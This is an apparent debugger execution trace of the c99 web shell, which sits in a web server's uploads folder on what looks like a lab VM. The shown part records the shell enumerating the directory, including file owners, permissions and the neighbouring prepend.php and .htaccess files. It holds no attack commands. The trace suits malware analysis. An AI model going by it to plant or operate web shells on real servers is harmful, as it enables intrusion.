1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2	278	0	0.018115	1342440	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/c99_php7.4.php'
2	278	1	0.018128	1342480
2	278	R			1000
2	279	0	0.018141	1342440	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	1000
2	279	1	0.018172	1343096
2	279	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'osboxes/osboxes'
2	280	0	0.018218	1343104	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/c99_php7.4.php'
2	280	1	0.018231	1343144
2	280	R			33204
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 33204
2	281	0	0.018254	1343104	is_link	0		/var/www/html/uploads/c99_php7.4.php	1981	1	'/var/www/html/uploads/c99_php7.4.php'
2	281	1	0.018269	1343184
2	281	R			FALSE
2	282	0	0.018282	1343144	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1982	1	'/var/www/html/uploads/c99_php7.4.php'
2	282	1	0.018294	1343184
2	282	R			FALSE
2	283	0	0.018306	1343144	is_file	0		/var/www/html/uploads/c99_php7.4.php	1983	1	'/var/www/html/uploads/c99_php7.4.php'
2	283	1	0.018318	1343184
2	283	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1983	$objects['files'][] = [0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
2	284	0	0.018357	1343520	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/..'
2	284	1	0.018371	1343584
2	284	R			'..'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = '..'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
1		A						/var/www/html/uploads/c99_php7.4.php	1963	$row[] = '/var/www/html/uploads/..'
1		A						/var/www/html/uploads/c99_php7.4.php	1963	$row[] = 'LINK'
2	285	0	0.018426	1343944	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/..'
2	285	1	0.018441	1343976
2	285	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	286	0	0.018464	1343936	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/..'
2	286	1	0.018477	1343976
2	286	R			0
2	287	0	0.018490	1343936	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	0
2	287	1	0.018511	1344736
2	287	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	288	0	0.018551	1343920	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/..'
2	288	1	0.018564	1343960
2	288	R			0
2	289	0	0.018576	1343920	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	0
2	289	1	0.018603	1344576
2	289	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'root/root'
2	290	0	0.018649	1343960	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/..'
2	290	1	0.018661	1344000
2	290	R			16895
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 16895
1		A						/var/www/html/uploads/c99_php7.4.php	1980	$objects['head'][] = [0 => '/var/www/html/uploads/..', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
2	291	0	0.018711	1344336	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/.'
2	291	1	0.018725	1344400
2	291	R			'.'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = '.'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
1		A						/var/www/html/uploads/c99_php7.4.php	1962	$row[] = '/var/www/html/uploads/.'
1		A						/var/www/html/uploads/c99_php7.4.php	1962	$row[] = 'LINK'
2	292	0	0.018778	1344760	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/.'
2	292	1	0.018793	1344792
2	292	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	293	0	0.018816	1344752	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/.'
2	293	1	0.018828	1344792
2	293	R			0
2	294	0	0.018841	1344752	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	0
2	294	1	0.018862	1345552
2	294	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	295	0	0.018901	1344752	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/.'
2	295	1	0.018914	1344792
2	295	R			0
2	296	0	0.018926	1344752	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	0
2	296	1	0.018946	1345408
2	296	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'root/root'
2	297	0	0.018991	1344792	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/.'
2	297	1	0.019004	1344832
2	297	R			16895
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 16895
1		A						/var/www/html/uploads/c99_php7.4.php	1980	$objects['head'][] = [0 => '/var/www/html/uploads/.', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
2	298	0	0.019054	1344792	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/prepend.php'
2	298	1	0.019068	1344864
2	298	R			'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = 'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
2	299	0	0.019103	1344800	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1964	1	'/var/www/html/uploads/prepend.php'
2	299	1	0.019118	1344856
2	299	R			FALSE
2	300	0	0.019131	1344816	is_file	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/prepend.php'
2	300	1	0.019144	1344856
2	300	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = '/var/www/html/uploads/prepend.php'
2	301	0	0.019168	1345192	filesize	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/prepend.php'
2	301	1	0.019181	1345232
2	301	R			57
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = 57
2	302	0	0.019204	1345192	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/prepend.php'
2	302	1	0.019217	1345232
2	302	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	303	0	0.019240	1345192	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/prepend.php'
2	303	1	0.019253	1345232
2	303	R			0
2	304	0	0.019266	1345192	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	0
2	304	1	0.019287	1345992
2	304	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	305	0	0.019331	1345192	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/prepend.php'
2	305	1	0.019344	1345232
2	305	R			0
2	306	0	0.019356	1345192	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	0
2	306	1	0.019377	1345848
2	306	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'root/root'
2	307	0	0.019422	1345232	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/prepend.php'
2	307	1	0.019435	1345272
2	307	R			33261
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 33261
2	308	0	0.019458	1345232	is_link	0		/var/www/html/uploads/c99_php7.4.php	1981	1	'/var/www/html/uploads/prepend.php'
2	308	1	0.019473	1345272
2	308	R			FALSE
2	309	0	0.019486	1345232	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1982	1	'/var/www/html/uploads/prepend.php'
2	309	1	0.019499	1345272
2	309	R			FALSE
2	310	0	0.019511	1345232	is_file	0		/var/www/html/uploads/c99_php7.4.php	1983	1	'/var/www/html/uploads/prepend.php'
2	310	1	0.019524	1345272
2	310	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1983	$objects['files'][] = [0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
2	311	0	0.019564	1345232	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/data'
2	311	1	0.019578	1345296
2	311	R			'data'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = 'data'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
2	312	0	0.019611	1345224	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1964	1	'/var/www/html/uploads/data'
2	312	1	0.019626	1345256
2	312	R			TRUE
2	313	0	0.019638	1345216	is_link	0		/var/www/html/uploads/c99_php7.4.php	1966	1	'/var/www/html/uploads/data'
2	313	1	0.019653	1345248
2	313	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	1967	$type = 'DIR'
1		A						/var/www/html/uploads/c99_php7.4.php	1968	$row[] = '/var/www/html/uploads/data'
1		A						/var/www/html/uploads/c99_php7.4.php	1969	$row[] = 'DIR'
2	314	0	0.019698	1345584	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/data'
2	314	1	0.019711	1345624
2	314	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	315	0	0.019734	1345584	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/data'
2	315	1	0.019747	1345624
2	315	R			0
2	316	0	0.019759	1345584	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	0
2	316	1	0.019785	1346384
2	316	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	317	0	0.019863	1345584	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/data'
2	317	1	0.019877	1345624
2	317	R			0
2	318	0	0.019890	1345584	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	0
2	318	1	0.019913	1346240
2	318	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'root/root'
2	319	0	0.019959	1345624	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/data'
2	319	1	0.019973	1345664
2	319	R			16895
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 16895
2	320	0	0.019996	1345624	is_link	0		/var/www/html/uploads/c99_php7.4.php	1981	1	'/var/www/html/uploads/data'
2	320	1	0.020009	1345664
2	320	R			FALSE
2	321	0	0.020022	1345624	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1982	1	'/var/www/html/uploads/data'
2	321	1	0.020035	1345664
2	321	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1982	$objects['folders'][] = [0 => '/var/www/html/uploads/data', 1 => 'DIR', 2 => 1676260944, 3 => 'root/root', 4 => 16895]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
2	322	0	0.020079	1346000	basename	0		/var/www/html/uploads/c99_php7.4.php	1960	1	'/var/www/html/uploads/.htaccess'
2	322	1	0.020093	1346072
2	322	R			'.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	1960	$o = '.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	1961	$row = []
2	323	0	0.020128	1346008	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1964	1	'/var/www/html/uploads/.htaccess'
2	323	1	0.020143	1346048
2	323	R			FALSE
2	324	0	0.020156	1346008	is_file	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/.htaccess'
2	324	1	0.020169	1346048
2	324	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = '/var/www/html/uploads/.htaccess'
2	325	0	0.020192	1346384	filesize	0		/var/www/html/uploads/c99_php7.4.php	1971	1	'/var/www/html/uploads/.htaccess'
2	325	1	0.020205	1346424
2	325	R			64
1		A						/var/www/html/uploads/c99_php7.4.php	1971	$row[] = 64
2	326	0	0.020228	1346384	filemtime	0		/var/www/html/uploads/c99_php7.4.php	1972	1	'/var/www/html/uploads/.htaccess'
2	326	1	0.020240	1346424
2	326	R			1676260944
1		A						/var/www/html/uploads/c99_php7.4.php	1972	$row[] = 1676260944
2	327	0	0.020263	1346384	fileowner	0		/var/www/html/uploads/c99_php7.4.php	1975	1	'/var/www/html/uploads/.htaccess'
2	327	1	0.020276	1346424
2	327	R			0
2	328	0	0.020288	1346384	posix_getpwuid	0		/var/www/html/uploads/c99_php7.4.php	1975	1	0
2	328	1	0.020310	1347184
2	328	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1		A						/var/www/html/uploads/c99_php7.4.php	1975	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	329	0	0.020350	1346384	filegroup	0		/var/www/html/uploads/c99_php7.4.php	1976	1	'/var/www/html/uploads/.htaccess'
2	329	1	0.020363	1346424
2	329	R			0
2	330	0	0.020375	1346384	posix_getgrgid	0		/var/www/html/uploads/c99_php7.4.php	1976	1	0
2	330	1	0.020395	1347040
2	330	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1976	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1		A						/var/www/html/uploads/c99_php7.4.php	1977	$row[] = 'root/root'
2	331	0	0.020441	1346424	fileperms	0		/var/www/html/uploads/c99_php7.4.php	1979	1	'/var/www/html/uploads/.htaccess'
2	331	1	0.020458	1346464
2	331	R			33188
1		A						/var/www/html/uploads/c99_php7.4.php	1979	$row[] = 33188
2	332	0	0.020483	1346424	is_link	0		/var/www/html/uploads/c99_php7.4.php	1981	1	'/var/www/html/uploads/.htaccess'
2	332	1	0.020498	1346464
2	332	R			FALSE
2	333	0	0.020510	1346424	is_dir	0		/var/www/html/uploads/c99_php7.4.php	1982	1	'/var/www/html/uploads/.htaccess'
2	333	1	0.020524	1346464
2	333	R			FALSE
2	334	0	0.020536	1346424	is_file	0		/var/www/html/uploads/c99_php7.4.php	1983	1	'/var/www/html/uploads/.htaccess'
2	334	1	0.020549	1346464
2	334	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	1983	$objects['files'][] = [0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188]
1		A						/var/www/html/uploads/c99_php7.4.php	1984	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	1986	$row = []
1		A						/var/www/html/uploads/c99_php7.4.php	1987	$row[] = '<b>Name</b>'
1		A						/var/www/html/uploads/c99_php7.4.php	1988	$row[] = '<b>Dimension</b>'
1		A						/var/www/html/uploads/c99_php7.4.php	1989	$row[] = '<b>Changing</b>'
1		A						/var/www/html/uploads/c99_php7.4.php	1991	$row[] = '<b>Owner/Grup</b>'
1		A						/var/www/html/uploads/c99_php7.4.php	1992	$row[] = '<b>Permissions(Authority)</b>'
1		A						/var/www/html/uploads/c99_php7.4.php	1993	$row[] = '<b>attribute</b>'
2	335	0	0.020665	1346800	parsesort	1		/var/www/html/uploads/c99_php7.4.php	1994	1	'0a'
2		A						/var/www/html/uploads/c99_php7.4.php	502	$one = 0
3	336	0	0.020688	1346800	substr	0		/var/www/html/uploads/c99_php7.4.php	503	2	'0a'	-1
3	336	1	0.020701	1346864
3	336	R			'a'
2		A						/var/www/html/uploads/c99_php7.4.php	503	$second = 'a'
2		A						/var/www/html/uploads/c99_php7.4.php	504	$second = 'a'
2	335	1	0.020734	1347176
2	335	R			[0 => 0, 1 => 'a']
1		A						/var/www/html/uploads/c99_php7.4.php	1994	$parsesort = [0 => 0, 1 => 'a']
1		A						/var/www/html/uploads/c99_php7.4.php	1995	$sort = '0a'
1		A						/var/www/html/uploads/c99_php7.4.php	1996	$k = 0
2	337	0	0.020786	1347224	urlencode	0		/var/www/html/uploads/c99_php7.4.php	1998	1	'/var/www/html/uploads/'
2	337	1	0.020800	1347320
2	337	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	1998	$y = '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d">'
1		A						/var/www/html/uploads/c99_php7.4.php	1999	$y .= '<img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2000	$row[0] .= '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d"><img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i = 0
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i++
2	338	0	0.020882	1347608	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2003	1	'/var/www/html/uploads/'
2	338	1	0.020896	1347704
2	338	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	2003	$row[1] = '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=1a"><b>Dimension</b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i++
2	339	0	0.020937	1347720	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2003	1	'/var/www/html/uploads/'
2	339	1	0.020950	1347816
2	339	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	2003	$row[2] = '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=2a"><b>Changing</b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i++
2	340	0	0.020989	1347832	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2003	1	'/var/www/html/uploads/'
2	340	1	0.021002	1347928
2	340	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	2003	$row[3] = '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=3a"><b>Owner/Grup</b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i++
2	341	0	0.021040	1347944	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2003	1	'/var/www/html/uploads/'
2	341	1	0.021053	1348040
2	341	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
1		A						/var/www/html/uploads/c99_php7.4.php	2003	$row[4] = '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=4a"><b>Permissions(Authority)</b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	2001	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2005	$v = 0
2	342	0	0.021103	1348048	usort	0		/var/www/html/uploads/c99_php7.4.php	2006	2	[0 => [0 => '/var/www/html/uploads/data', 1 => 'DIR', 2 => 1676260944, 3 => 'root/root', 4 => 16895]]	'tabsort'
2	342	1	0.021122	1348120
2	342	R			TRUE
2	343	0	0.021135	1348072	usort	0		/var/www/html/uploads/c99_php7.4.php	2007	2	[]	'tabsort'
2	343	1	0.021149	1348144
2	343	R			TRUE
2	344	0	0.021161	1348096	usort	0		/var/www/html/uploads/c99_php7.4.php	2008	2	[0 => [0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204], 1 => [0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261], 2 => [0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188]]	'tabsort'
3	345	0	0.021186	1348544	tabsort	1		/var/www/html/uploads/c99_php7.4.php	2008	2	[0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204]	[0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]
4	346	0	0.021207	1348568	strnatcmp	0		/var/www/html/uploads/c99_php7.4.php	446	2	'/var/www/html/uploads/c99_php7.4.php'	'/var/www/html/uploads/prepend.php'
4	346	1	0.021221	1348632
4	346	R			-1
3	345	1	0.021234	1348568
3	345	R			-1
3	347	0	0.021247	1348568	tabsort	1		/var/www/html/uploads/c99_php7.4.php	2008	2	[0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]	[0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188]
4	348	0	0.021266	1348568	strnatcmp	0		/var/www/html/uploads/c99_php7.4.php	446	2	'/var/www/html/uploads/prepend.php'	'/var/www/html/uploads/.htaccess'
4	348	1	0.021281	1348632
4	348	R			1
3	347	1	0.021293	1348568
3	347	R			1
3	349	0	0.021306	1348568	tabsort	1		/var/www/html/uploads/c99_php7.4.php	2008	2	[0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204]	[0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188]
4	350	0	0.021326	1348568	strnatcmp	0		/var/www/html/uploads/c99_php7.4.php	446	2	'/var/www/html/uploads/c99_php7.4.php'	'/var/www/html/uploads/.htaccess'
4	350	1	0.021340	1348632
4	350	R			1
3	349	1	0.021352	1348568
3	349	R			1
2	344	1	0.021364	1348192
2	344	R			TRUE
2	351	0	0.021378	1348048	array_merge	0		/var/www/html/uploads/c99_php7.4.php	2014	4	[0 => [0 => '/var/www/html/uploads/..', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 1 => [0 => '/var/www/html/uploads/.', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895]]	[0 => [0 => '/var/www/html/uploads/data', 1 => 'DIR', 2 => 1676260944, 3 => 'root/root', 4 => 16895]]	[]	[0 => [0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188], 1 => [0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204], 2 => [0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]]
2	351	1	0.021414	1348488
2	351	R			[0 => [0 => '/var/www/html/uploads/..', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 1 => [0 => '/var/www/html/uploads/.', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 2 => [0 => '/var/www/html/uploads/data', 1 => 'DIR', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 3 => [0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188], 4 => [0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204], 5 => [0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]]
1		A						/var/www/html/uploads/c99_php7.4.php	2014	$objects = [0 => [0 => '/var/www/html/uploads/..', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 1 => [0 => '/var/www/html/uploads/.', 1 => 'LINK', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 2 => [0 => '/var/www/html/uploads/data', 1 => 'DIR', 2 => 1676260944, 3 => 'root/root', 4 => 16895], 3 => [0 => '/var/www/html/uploads/.htaccess', 1 => 64, 2 => 1676260944, 3 => 'root/root', 4 => 33188], 4 => [0 => '/var/www/html/uploads/c99_php7.4.php', 1 => 160253, 2 => 1676260944, 3 => 'osboxes/osboxes', 4 => 33204], 5 => [0 => '/var/www/html/uploads/prepend.php', 1 => 57, 2 => 1676260944, 3 => 'root/root', 4 => 33261]]
1		A						/var/www/html/uploads/c99_php7.4.php	2015	$tab = []
1		A						/var/www/html/uploads/c99_php7.4.php	2016	$tab['cols'] = [0 => [0 => '<b>Name</b><a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d"><img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>', 1 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=1a"><b>Dimension</b></a>', 2 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=2a"><b>Changing</b></a>', 3 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=3a"><b>Owner/Grup</b></a>', 4 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=4a"><b>Permissions(Authority)</b></a>', 5 => '<b>attribute</b>']]
1		A						/var/www/html/uploads/c99_php7.4.php	2017	$tab['head'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	2018	$tab['folders'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	2019	$tab['links'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	2020	$tab['files'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	2021	$i = 0
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/..'
2	352	0	0.021582	1347672	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/..'
2	352	1	0.021596	1347736
2	352	R			'..'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = '..'
2	353	0	0.021620	1347664	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/..'
2	353	1	0.021633	1347752
2	353	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = '..'
2	354	0	0.021668	1347720	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'..'	60
2	354	1	0.021681	1347720
2	354	R			'..'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = '..'
2	355	0	0.021704	1347720	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/..'	[]
2	355	1	0.021717	1347792
2	355	R			FALSE
